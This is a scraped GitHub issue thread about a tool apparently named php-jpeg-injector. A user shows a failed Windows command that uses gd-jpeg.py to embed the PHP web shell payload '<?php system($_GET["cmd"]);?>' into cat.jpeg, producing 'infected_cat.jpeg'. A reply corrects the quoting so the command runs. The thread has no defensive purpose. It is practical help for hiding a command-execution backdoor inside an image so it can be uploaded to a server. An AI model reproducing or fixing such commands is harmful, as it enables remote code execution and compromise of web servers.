We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
https://github.com/Himel-Sarkar/issuissues-/blob/main/php2jpg_issues.PNG?raw=true
==================================== issue ============================ C:\Users\Himel\AppData\Local\Temp\a\php2jpg>dir/b 2.jpeg cat.jpg gd-jpeg.py php-jpeg-injector-master.zip
C:\Users\Himel\AppData\Local\Temp\a\php2jpg>py gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg The filename, directory name, or volume label syntax is incorrect.
py gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
C:\Users\Himel\AppData\Local\Temp\a\php2jpg>python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg The filename, directory name, or volume label syntax is incorrect.
python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
The text was updated successfully, but these errors were encountered:
replace : ( ' ) with ( " ) python3 gd-jpeg.py cat.jpeg "<?php system($_GET["cmd"]);?>" infected_cat.jpeg
python3 gd-jpeg.py cat.jpeg "<?php system($_GET["cmd"]);?>" infected_cat.jpeg
Sorry, something went wrong.
No branches or pull requests
https://github.com/Himel-Sarkar/issuissues-/blob/main/php2jpg_issues.PNG?raw=true
==================================== issue ============================
C:\Users\Himel\AppData\Local\Temp\a\php2jpg>dir/b
2.jpeg
cat.jpg
gd-jpeg.py
php-jpeg-injector-master.zip
C:\Users\Himel\AppData\Local\Temp\a\php2jpg>
py gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
The filename, directory name, or volume label syntax is incorrect.
C:\Users\Himel\AppData\Local\Temp\a\php2jpg>
python3 gd-jpeg.py cat.jpeg '<?php system($_GET["cmd"]);?>' infected_cat.jpeg
The filename, directory name, or volume label syntax is incorrect.
The text was updated successfully, but these errors were encountered: